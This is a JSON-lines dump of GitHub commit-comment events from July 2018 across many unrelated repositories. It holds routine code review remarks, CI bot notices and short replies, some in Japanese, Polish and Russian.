{"id":"7951148170","type":"CommitCommentEvent","actor":{"login":"dougshell"},"repo":{"name":"dguzek/Simply-Love-SM5"},"payload":{"comment":{"id":29673533,"position":null,"line":null,"path":null,"commit_id":"cc0da16e8d050d8d420100393b8ebc6930fa59bf","created_at":"2018-07-11T16:13:45Z","updated_at":"2018-07-11T16:13:45Z","author_association":"NONE","body":"I hadnt even looked further. I was just joshing around.\n\nEither way, I'm super excited to see the changes you have made and hope\nthat this handles any lingering issues you may have had with the previous\ncode base.\n\nCongratulations once again!!\n\nOn Wed, Jul 11, 2018, 12:09 PM Dan Guzek <notifications@github.com> wrote:\n\n> To be fair, this commit occurred on May 2, 2018, and you submitted your\n> first pull request <https://github.com/dguzek/Simply-Love-SM5/pull/113> a\n> week later on May 8, 2018. You were added to the Acknowledgments a day a\n> later, May 9, 2018. See: 9c758b6\n> <https://github.com/dguzek/Simply-Love-SM5/commit/9c758b6442de5bb2c1f41947a44e06d00400508b>\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dguzek/Simply-Love-SM5/commit/cc0da16e8d050d8d420100393b8ebc6930fa59bf#commitcomment-29673480>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEwyE_dgQy7YwiokAn1VeTail7bA8dXBks5uFiNMgaJpZM4VIC2A>\n> .\n>\n"}},"created_at":"2018-07-11T16:13:45Z"}
{"id":"7951150935","type":"CommitCommentEvent","actor":{"login":"Varun-garg"},"repo":{"name":"Varun-garg/GBU_Timetables"},"payload":{"comment":{"id":29673541,"position":5,"line":5,"path":"app/build.gradle","commit_id":"a1e782fa6863da1249fe3244cb1144afa7cfdb0d","created_at":"2018-07-11T16:14:16Z","updated_at":"2018-07-11T16:14:16Z","author_association":"OWNER","body":"Nice update. Meanwhile, I have added Travis to automatically build APK, we can use it for more than that such as testing (will require unit test classes). Please update a file `.travis.yml` when you modify `buildToolsVersion` or `targetSdkVersion`."}},"created_at":"2018-07-11T16:14:16Z"}
{"id":"7951153246","type":"CommitCommentEvent","actor":{"login":"MichalStrehovsky"},"repo":{"name":"stephentoub/corefx"},"payload":{"comment":{"id":29673547,"position":5,"line":36,"path":"src/System.Linq/src/System/Linq/Select.cs","commit_id":"1ec82bfe505efa0be0fa2180f9329100178b14dc","created_at":"2018-07-11T16:14:42Z","updated_at":"2018-07-11T16:14:42Z","author_association":"NONE","body":"@stephentoub At least some of the new array types are coming from here. Looks like special casing arrays of length 0 was added here: https://github.com/dotnet/corefx/commit/2ee071b584406f9aebc6a2a93fdd0d0ea6ffffdb. We weren't calling Empty here before.\r\n\r\nMaybe changing the implementation of Empty to not to return actual arrays might help."}},"created_at":"2018-07-11T16:14:42Z"}
{"id":"7951157253","type":"CommitCommentEvent","actor":{"login":"sven-n"},"repo":{"name":"MUnique/OpenMU"},"payload":{"comment":{"id":29673552,"position":null,"line":null,"path":null,"commit_id":"2e79aa24bed37035790a513bb795f4b588c8145b","created_at":"2018-07-11T16:15:25Z","updated_at":"2018-07-11T16:15:25Z","author_association":"MEMBER","body":"In case of non-equippable items, \"durability\" often means \"number of pieces\", e.g. when you buy stacked potions. I also thought about adding a separate property to it at #3.\r\nYou can (and should) configure a merchant store to sell the item with 1 \"durability\". The DefaultDropGenerator also sets \"durability\" to 1 for freshly dropped items. I'm not entirely sure how the original server handles this, but I think it was the same.\r\n\r\nPlayer.CompliesRequirements is correct as it is. Look, the left expression tells you the attribute value of character, where the right one is the required value. CompliesRequirements returns false, if this expression is true. So when the attribute value of the character is lower than the requirement, it does not comply the requirement and therefore the method returns false.\r\n"}},"created_at":"2018-07-11T16:15:25Z"}
{"id":"7951157303","type":"CommitCommentEvent","actor":{"login":"Varun-garg"},"repo":{"name":"Varun-garg/GBU_Timetables"},"payload":{"comment":{"id":29673553,"position":15,"line":40,"path":"app/src/main/java/com/varun/gbu_timetables/asyncTask/UpdateDatabaseOnlineTask.java","commit_id":"a1e782fa6863da1249fe3244cb1144afa7cfdb0d","created_at":"2018-07-11T16:15:25Z","updated_at":"2018-07-11T16:15:25Z","author_association":"OWNER","body":"We can make these properties more dynamic by using firebase dynamic links."}},"created_at":"2018-07-11T16:15:25Z"}
{"id":"7951159272","type":"CommitCommentEvent","actor":{"login":"SahilLangoo"},"repo":{"name":"zero-to-mastery/start-here-guidelines"},"payload":{"comment":{"id":29673556,"position":null,"line":null,"path":null,"commit_id":"d480b46f5f7d9a6defbe2f9b3f16deb162a58285","created_at":"2018-07-11T16:15:46Z","updated_at":"2018-07-11T16:15:46Z","author_association":"NONE","body":"https://github.com/SahilLangoo"}},"created_at":"2018-07-11T16:15:46Z"}
{"id":"7951164437","type":"CommitCommentEvent","actor":{"login":"Zhikh"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.05_06"},"payload":{"comment":{"id":29673570,"position":null,"line":null,"path":null,"commit_id":"6a1f835b0220b2ddd991042cf7fedd39239e2462","created_at":"2018-07-11T16:16:44Z","updated_at":"2018-07-11T16:16:44Z","author_association":"OWNER","body":"исправила: https://github.com/Zhikh/NET.S.2018.Zhikh.05_06/commit/631c3315dc550e52c47469522694d26c2634549a"}},"created_at":"2018-07-11T16:16:44Z"}
{"id":"7951166654","type":"CommitCommentEvent","actor":{"login":"SahilLangoo"},"repo":{"name":"zero-to-mastery/start-here-guidelines"},"payload":{"comment":{"id":29673572,"position":null,"line":null,"path":null,"commit_id":"d480b46f5f7d9a6defbe2f9b3f16deb162a58285","created_at":"2018-07-11T16:17:10Z","updated_at":"2018-07-11T16:17:10Z","author_association":"NONE","body":"-[@SahilLangoo](https://github.com/SahilLangoo)"}},"created_at":"2018-07-11T16:17:10Z"}
{"id":"7951168572","type":"CommitCommentEvent","actor":{"login":"Konfekt"},"repo":{"name":"itaraju/dotfiles"},"payload":{"comment":{"id":29673575,"position":null,"line":null,"path":null,"commit_id":"b4e733304d6e6e17b59b80651879069bdfa0fa1a","created_at":"2018-07-11T16:17:31Z","updated_at":"2018-07-11T16:17:31Z","author_association":"NONE","body":"How about https://konfekt.github.io/blog/2016/10/03/get-the-leader-right"}},"created_at":"2018-07-11T16:17:31Z"}
{"id":"7951171459","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29673583,"position":30,"line":30,"path":"018/1801.html","commit_id":"5b34d142cc68fbe08d51d16d6ee6236cb7587a5c","created_at":"2018-07-11T16:18:04Z","updated_at":"2018-07-11T16:18:04Z","author_association":"COLLABORATOR","body":"@c-osanai \r\n`i` の値をanswerProfile関数の外側から参照できないことを確認してみましょう。\r\nここでconsole.log(i)とやると確認できるかと思います。\r\n\r\nまた、 \r\n`for (var i = 0; i < profiles.length; i++)` を `for (i = 0; i < profiles.length; i++)` とするとどうなるかも確認してみましょう(すでにご存知かもしれません)。"}},"created_at":"2018-07-11T16:18:04Z"}
{"id":"7951175810","type":"CommitCommentEvent","actor":{"login":"jwflory"},"repo":{"name":"unicef/magicbox"},"payload":{"comment":{"id":29673596,"position":50,"line":120,"path":"docs/admin/github-workflow.rst","commit_id":"965e893ce2476a8a503fe5722630940cf0bd2f21","created_at":"2018-07-11T16:18:51Z","updated_at":"2018-07-11T16:18:51Z","author_association":"MEMBER","body":"For what it's worth, I thought the table was useful because it was a public and visible reference to the labels in the documentation. I personally think it's okay to keep the table here even if the colors do deviate, since it's mostly for the purpose of providing an example of how we do labeling (so someone outside of UNICEF could also see them in the greater context of our docs).\r\n\r\nFor me, this was something I was specifically referring back to and pointing other people at in the past, so I was a little confused at first when I noticed the table was gone. This is my personal preference, but I thought I would mention it."}},"created_at":"2018-07-11T16:18:51Z"}
{"id":"7951175835","type":"CommitCommentEvent","actor":{"login":"itchka"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29673597,"position":11,"line":18,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T16:18:51Z","updated_at":"2018-07-11T16:18:51Z","author_association":"CONTRIBUTOR","body":"Yes I see this no init any more"}},"created_at":"2018-07-11T16:18:51Z"}
{"id":"7951176506","type":"CommitCommentEvent","actor":{"login":"Darknior"},"repo":{"name":"grant2258/hypseus"},"payload":{"comment":{"id":29673598,"position":null,"line":null,"path":null,"commit_id":"1f2b8b10964f275264f781879929bf031430604e","created_at":"2018-07-11T16:18:59Z","updated_at":"2018-07-11T16:18:59Z","author_association":"NONE","body":"Thanks a lot"}},"created_at":"2018-07-11T16:18:59Z"}
{"id":"7951183084","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29673615,"position":null,"line":null,"path":null,"commit_id":"bf06a3fc53ee03d5df590e263a32ea4bd90eb906","created_at":"2018-07-11T16:20:12Z","updated_at":"2018-07-11T16:20:12Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-grid](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-grid).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-grid-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T16:20:12Z"}
{"id":"7951185905","type":"CommitCommentEvent","actor":{"login":"itchka"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29673621,"position":13,"line":20,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T16:20:42Z","updated_at":"2018-07-11T16:20:42Z","author_association":"CONTRIBUTOR","body":"So replace wirth \r\nBuildRequires: pkgconfig(python) \r\nThis will bring in the python3-devel package"}},"created_at":"2018-07-11T16:20:42Z"}
{"id":"7951187731","type":"CommitCommentEvent","actor":{"login":"itchka"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29673625,"position":14,"line":21,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T16:21:02Z","updated_at":"2018-07-11T16:21:02Z","author_association":"CONTRIBUTOR","body":"To make sure systemctl is there.."}},"created_at":"2018-07-11T16:21:02Z"}
{"id":"7951190508","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29673626,"position":null,"line":null,"path":null,"commit_id":"418f36bba19bc28fd09c360f5e49d07529ed554e","created_at":"2018-07-11T16:21:33Z","updated_at":"2018-07-11T16:21:33Z","author_association":"NONE","body":"No problem! I got good news for you, e-mail me at christianbremvaag@gmail.com - delere this when you got my enail ;)"}},"created_at":"2018-07-11T16:21:33Z"}
{"id":"7951196118","type":"CommitCommentEvent","actor":{"login":"RemyNoulin"},"repo":{"name":"jorisvink/kore"},"payload":{"comment":{"id":29673643,"position":null,"line":null,"path":null,"commit_id":"cffb7ec3798684c3a59326de9c1e1f286db34334","created_at":"2018-07-11T16:22:36Z","updated_at":"2018-07-11T16:22:36Z","author_association":"NONE","body":"Good!"}},"created_at":"2018-07-11T16:22:36Z"}
{"id":"7951197269","type":"CommitCommentEvent","actor":{"login":"jarlebring"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29673647,"position":5,"line":18,"path":"src/method_iar_chebyshev.jl","commit_id":"e1b49ca9d38c9664ea24b46f2f1aba95931f73d1","created_at":"2018-07-11T16:22:49Z","updated_at":"2018-07-11T16:22:49Z","author_association":"CONTRIBUTOR","body":"Suggestion: Instead of having of having one `PrecomputeData` for all the   `ComputeY0`, you could have a separate into several types, at least for ComputeY0ChebSPMF_NEP, e.g. \r\n```\r\ntype PrecomputeDataSPMF <: AbstractPrecomputeData\r\n    DDf\r\nend\r\n```\r\nand then remove DDf from `PrecomputeData`."}},"created_at":"2018-07-11T16:22:49Z"}
{"id":"7951199808","type":"CommitCommentEvent","actor":{"login":"mafiesto4"},"repo":{"name":"FlaxEngine/XShaderCompiler"},"payload":{"comment":{"id":29673648,"position":6,"line":142,"path":"inc/Xsc/Xsc.h","commit_id":"0121f92d155071f97566cf313be69973aa3f0bc5","created_at":"2018-07-11T16:23:16Z","updated_at":"2018-07-11T16:23:16Z","author_association":"MEMBER","body":"Cool thanks! I'll take your changes."}},"created_at":"2018-07-11T16:23:16Z"}
{"id":"7951204238","type":"CommitCommentEvent","actor":{"login":"illfated"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29673656,"position":null,"line":null,"path":null,"commit_id":"2ef33158486831aa061050f5cc7d316fee17721d","created_at":"2018-07-11T16:24:07Z","updated_at":"2018-07-11T16:24:07Z","author_association":"NONE","body":"🤦‍♂️  Meh. I notice coders love to use the word `{ fix, fixes, fixed }` even though it is one of the more ambiguous words to choose from to describe what changed. :-P"}},"created_at":"2018-07-11T16:24:07Z"}
{"id":"7951206170","type":"CommitCommentEvent","actor":{"login":"rameshvs02"},"repo":{"name":"percona/proxysql-admin-tool"},"payload":{"comment":{"id":29673658,"position":10,"line":103,"path":"proxysql_galera_checker","commit_id":"c62fab306c2ac062e66722a416d76a5841b514b1","created_at":"2018-07-11T16:24:28Z","updated_at":"2018-07-11T16:24:28Z","author_association":"CONTRIBUTOR","body":"@kennt-percona . I think we should replace the above code with this.\r\n```\r\n# Check monitor user credentials.\r\nCLUSTER_HOSTS=($(proxysql_exec \"SELECT hostname || ':' || port FROM mysql_servers WHERE comment<>'SLAVEREAD' and hostgroup_id in ($HOSTGROUP_WRITER_ID, $HOSTGROUP_READER_ID)\"))\r\nfor i in \"${CLUSTER_HOSTS[@]}\"; do\r\n  CLUSTER_HOSTNAME=$(echo $i | cut -d':' -f1)\r\n  CLUSTER_PORT=$(echo $i | cut -d':' -f2)\r\n  CHECK_SERVER_PORT=$( { printf \"[client]\\nuser=${MYSQL_USERNAME}\\npassword=\\\"${MYSQL_PASSWORD}\\\"\\nhost=${CLUSTER_HOSTNAME}\\nport=${CLUSTER_PORT}\\n\" | mysql --defaults-file=/dev/stdin --protocol=tcp -Bse \"select @@port\" 2>/dev/null; }  2>&1 )\r\n  if [[ -n $CHECK_SERVER_PORT ]]; then\r\n\tbreak\r\n  else\r\n    CHECK_MONITOR_USER=1\r\n  fi  \r\ndone\r\nif [[ $CHECK_MONITOR_USER -eq 1 ]]; then\r\n  echoit \"Could not establish connection to PXC nodes using ProxySQL monitor credentials. Please check credentials or PXC running status.\" \r\nfi\r\n```\r\n\r\nPlease review it."}},"created_at":"2018-07-11T16:24:28Z"}
{"id":"7951229712","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29673716,"position":null,"line":null,"path":null,"commit_id":"df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6","created_at":"2018-07-11T16:28:54Z","updated_at":"2018-07-11T16:28:54Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T16:28:54Z"}
{"id":"7951234522","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"kallewoof/btcdeb"},"payload":{"comment":{"id":29673721,"position":null,"line":null,"path":null,"commit_id":"256947e523746e6c4b87ffbca3bc418f7d5e1a38","created_at":"2018-07-11T16:29:47Z","updated_at":"2018-07-11T16:29:47Z","author_association":"NONE","body":"256947e"}},"created_at":"2018-07-11T16:29:47Z"}
{"id":"7951237004","type":"CommitCommentEvent","actor":{"login":"mbendaoud"},"repo":{"name":"mbendaoud/warehouse-bend"},"payload":{"comment":{"id":29673728,"position":null,"line":null,"path":null,"commit_id":"4a2e4e2b9901b0961ca1a9f7fc38a0cacf760494","created_at":"2018-07-11T16:30:14Z","updated_at":"2018-07-11T16:30:14Z","author_association":"OWNER","body":"cest goood"}},"created_at":"2018-07-11T16:30:14Z"}
{"id":"7951241789","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29673739,"position":null,"line":null,"path":null,"commit_id":"04681f28de99cd3699972836f42aa875dba68c7c","created_at":"2018-07-11T16:31:02Z","updated_at":"2018-07-11T16:31:02Z","author_association":"CONTRIBUTOR","body":"Not exactly sure why, but dragrace.cpp now repeatedly triggers watchdog.\r\n![dragrace-diff](https://user-images.githubusercontent.com/9075896/42586494-4175a5f6-8506-11e8-8584-0756b9ed1544.png)\r\n"}},"created_at":"2018-07-11T16:31:02Z"}
{"id":"7951246867","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/nhmla"},"payload":{"comment":{"id":29673747,"position":null,"line":null,"path":null,"commit_id":"9159d7ebf89b0ba8818fff4650921942dce8996b","created_at":"2018-07-11T16:31:58Z","updated_at":"2018-07-11T16:31:58Z","author_association":"MEMBER","body":"Created multidev environment [nhmla#ci-3](https://dashboard.pantheon.io/sites/5e274a0d-a22e-4c9c-95aa-12ce53d2efa6#ci-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-3-nhmla.pantheonsite.io/)"}},"created_at":"2018-07-11T16:31:58Z"}
{"id":"7951250256","type":"CommitCommentEvent","actor":{"login":"Sekva"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29673752,"position":null,"line":null,"path":null,"commit_id":"070d451843f11d60c2c30396a34b72bb53b55185","created_at":"2018-07-11T16:32:36Z","updated_at":"2018-07-11T16:32:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Realizar cadastro (matheus)](https://trello.com/c/jY8G7f7J/5-realizar-cadastro-matheus)"}},"created_at":"2018-07-11T16:32:36Z"}
{"id":"7951251117","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"p51i/next50"},"payload":{"comment":{"id":29673754,"position":null,"line":null,"path":null,"commit_id":"a59fb0f8a46df812eb76fc3b0091f5cc40600b50","created_at":"2018-07-11T16:32:45Z","updated_at":"2018-07-11T16:32:45Z","author_association":"OWNER","body":"Created multidev environment [next50#ci-2](https://dashboard.pantheon.io/sites/5a4cf60c-6be0-499b-aba2-a87e5c886799#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T16:32:45Z"}
{"id":"7951255288","type":"CommitCommentEvent","actor":{"login":"dkreidler"},"repo":{"name":"dkreidler/5.JSON"},"payload":{"comment":{"id":29673764,"position":null,"line":null,"path":null,"commit_id":"cf2ba50549a62cd34e6d71c18a636e0ed1cda9bd","created_at":"2018-07-11T16:33:34Z","updated_at":"2018-07-11T16:33:34Z","author_association":"OWNER","body":"Mentally, I want the ability to initialize the variable, craft it to do the document.createElement('type') AND set the textContent all in one go... perhaps that's either just not viable, or poor design in terms of revisiting and updating elements. This is clean, if repetitive."}},"created_at":"2018-07-11T16:33:34Z"}
{"id":"7951258846","type":"CommitCommentEvent","actor":{"login":"stevegolton"},"repo":{"name":"stevegolton/librouteros"},"payload":{"comment":{"id":29673768,"position":null,"line":null,"path":null,"commit_id":"d7c1de0a8b810853a48b9fc741d4c8492e597590","created_at":"2018-07-11T16:34:16Z","updated_at":"2018-07-11T16:34:16Z","author_association":"OWNER","body":"Actually, thinking about it, I'm not sure they are the same issue. The timeout would never be reached if it was spinning in an infinite loop as read() would be returing very quickly."}},"created_at":"2018-07-11T16:34:16Z"}
{"id":"7951260437","type":"CommitCommentEvent","actor":{"login":"ChriZathens"},"repo":{"name":"Novik/ruTorrent"},"payload":{"comment":{"id":29673776,"position":null,"line":null,"path":null,"commit_id":"20cd328e48452248f34b15464aad76f18d98ef6a","created_at":"2018-07-11T16:34:36Z","updated_at":"2018-07-11T16:34:36Z","author_association":"COLLABORATOR","body":"@Micdu70 , nice touch!!\r\nI have a proposition: What do you thing about using a parenthesis?\r\nI believe it looks better, but since this is subjective I am posting a screenshot here to see how it looks after I changed it\r\n![screen](https://user-images.githubusercontent.com/8545172/42586716-63810e3e-8541-11e8-98df-3dd64358fdeb.jpg)\r\nLet me know what you think... "}},"created_at":"2018-07-11T16:34:36Z"}
{"id":"7951261983","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29673781,"position":null,"line":null,"path":null,"commit_id":"1e0d58222d278d0ef29c6bae1ef4a3e9131ea690","created_at":"2018-07-11T16:34:53Z","updated_at":"2018-07-11T16:34:53Z","author_association":"CONTRIBUTOR","body":"Ahhh, no worries.  When you've selected it, make sure you get it ok-d by the other contributors too, just to be on the safe side legally. :smile:"}},"created_at":"2018-07-11T16:34:53Z"}
{"id":"7951263635","type":"CommitCommentEvent","actor":{"login":"1federico1"},"repo":{"name":"keunwoochoi/transfer_learning_music"},"payload":{"comment":{"id":29673785,"position":208,"line":208,"path":"1. feature extraction for 6 tasks.ipynb","commit_id":"77dd66d77b5d4990ac1e493e2d69d589d6c85da1","created_at":"2018-07-11T16:35:13Z","updated_at":"2018-07-11T16:35:13Z","author_association":"NONE","body":"What is the expected behavior of this line of code ? I mean, when you do `` os.path.join(FOLDER_CSV, csv_filename)`` what do you expect in output ? Because var ``filename`` is a list of paths, and the result, to my knowledge, is still a list. So when you do ``pd.DataFrame.from_csv(list)`` you get a path that is of the form ``FOLDER_CSV/[list of paths].csv``, causing an error on finding the file. Maybe my problem is that I'm using the wrong version of pandas (0.22). What did you use ? Thanks in advance. \r\nP.S. I'm also using Python 2.7.15rc1 on Ubuntu 18.04."}},"created_at":"2018-07-11T16:35:13Z"}
{"id":"7951266154","type":"CommitCommentEvent","actor":{"login":"Bjwebb"},"repo":{"name":"open-contracting/standard"},"payload":{"comment":{"id":29673788,"position":null,"line":null,"path":null,"commit_id":"9faa33753fbcb75e2909e993a05cd4a9046c4b12","created_at":"2018-07-11T16:35:39Z","updated_at":"2018-07-11T16:35:39Z","author_association":"CONTRIBUTOR","body":"Actually, its only the default for new repos added to Travis after a certain date. This means the standard docs are now building on VMs (sudo: true), but the ppp docs are still containers (sudo: false)."}},"created_at":"2018-07-11T16:35:39Z"}
{"id":"7951274585","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29673799,"position":130,"line":114,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T16:37:16Z","updated_at":"2018-07-11T16:37:16Z","author_association":"OWNER","body":"In essence you are right. \r\n\r\nBut...\r\n\r\nFirst, if both Remittance instances are derived off the same contract, it doesn't make sense for Carol to use these two different services. She would use one of them. In that case, the situation wouldn't arise.\r\n\r\nIf they are derived off two different contract definitions, then the following situation applies in the same manner:\r\n\r\nImagine that Carol, apart from a remittance contract, has some other unrelated service contract X she is using. That contract has an interface Y that accept the recipient's address (Carol's) and a password. She recognizes the hash. She doesn't need the password anymore and uses the hash to do whatever Contract X's functionality is.\r\n\r\nIt boils down here to just applying a sound security rule: use a different and strong password for different services...\r\n\r\n"}},"created_at":"2018-07-11T16:37:16Z"}
{"id":"7951275952","type":"CommitCommentEvent","actor":{"login":"rudykocur"},"repo":{"name":"Kgrzeskowiak/first"},"payload":{"comment":{"id":29673806,"position":10,"line":11,"path":"LibraryPowered.js","commit_id":"076f2ee4d7b3f5a8219bcec7684237c5f9fe540f","created_at":"2018-07-11T16:37:31Z","updated_at":"2018-07-11T16:37:31Z","author_association":"NONE","body":"bazie danych musisz przekazać bazę danych zeby potrafiła usunąć z niej książkę??"}},"created_at":"2018-07-11T16:37:31Z"}
{"id":"7951277337","type":"CommitCommentEvent","actor":{"login":"jstoiko"},"repo":{"name":"raml-org/raml-examples"},"payload":{"comment":{"id":29673810,"position":null,"line":null,"path":null,"commit_id":"e91308b6b944a47e1645f23b7a2397ccc58fed3a","created_at":"2018-07-11T16:37:47Z","updated_at":"2018-07-11T16:37:47Z","author_association":"MEMBER","body":"You are right Christian and thank you for pointing it out. Like you said, API definitions SHOULD indeed use `type` instead of `schema` according to the (RAML 1.0) spec. \r\n\r\nThe reason I changed this is that the expansion library was chocking on that particular XSD when defined as `type`, `schema` however worked. It was the easier fix.\r\n\r\nThere are other places in this repo where `schema` is used so we should eventually consider replacing all those occurencies with `type`."}},"created_at":"2018-07-11T16:37:47Z"}
{"id":"7951278738","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29673818,"position":null,"line":null,"path":null,"commit_id":"df2f39d5ea2bacb42851be8ea5f962c59ac09369","created_at":"2018-07-11T16:38:05Z","updated_at":"2018-07-11T16:38:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-163803 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-163803\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T16:38:05Z"}
{"id":"7951279454","type":"CommitCommentEvent","actor":{"login":"rudykocur"},"repo":{"name":"Kgrzeskowiak/first"},"payload":{"comment":{"id":29673820,"position":38,"line":41,"path":"LibraryPowered.js","commit_id":"076f2ee4d7b3f5a8219bcec7684237c5f9fe540f","created_at":"2018-07-11T16:38:13Z","updated_at":"2018-07-11T16:38:13Z","author_association":"NONE","body":"nope"}},"created_at":"2018-07-11T16:38:13Z"}
{"id":"7951280565","type":"CommitCommentEvent","actor":{"login":"aaronkaplan"},"repo":{"name":"aaronkaplan/Reference-Security-Incident-Taxonomy-Task-Force"},"payload":{"comment":{"id":29673824,"position":null,"line":null,"path":null,"commit_id":"c4772b41222f6ca0ddf31d59c9258c683036a83b","created_at":"2018-07-11T16:38:27Z","updated_at":"2018-07-11T16:38:27Z","author_association":"OWNER","body":"I do. Sorry. \n\n---\nMobile\n\n> On 11.07.2018, at 17:09, Ross McFarland <notifications@github.com> wrote:\n> \n> @aaronkaplan I assume you have the wrong @ross\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-11T16:38:27Z"}
{"id":"7951283261","type":"CommitCommentEvent","actor":{"login":"rudykocur"},"repo":{"name":"Kgrzeskowiak/first"},"payload":{"comment":{"id":29673828,"position":66,"line":61,"path":"LibraryPowered.js","commit_id":"076f2ee4d7b3f5a8219bcec7684237c5f9fe540f","created_at":"2018-07-11T16:39:00Z","updated_at":"2018-07-11T16:39:00Z","author_association":"NONE","body":"a co ja mówiłem o dobieraniu się do prywatnych atrybtutów innych obiektów? Po łapach za to"}},"created_at":"2018-07-11T16:39:00Z"}
{"id":"7951285656","type":"CommitCommentEvent","actor":{"login":"rudykocur"},"repo":{"name":"Kgrzeskowiak/first"},"payload":{"comment":{"id":29673837,"position":61,"line":56,"path":"LibraryPowered.js","commit_id":"076f2ee4d7b3f5a8219bcec7684237c5f9fe540f","created_at":"2018-07-11T16:39:29Z","updated_at":"2018-07-11T16:39:29Z","author_association":"NONE","body":"to mieliśmy inaczej zrobić - oparte o tbody i usuwanię wszystkiego z całego węzła tbody ..."}},"created_at":"2018-07-11T16:39:29Z"}
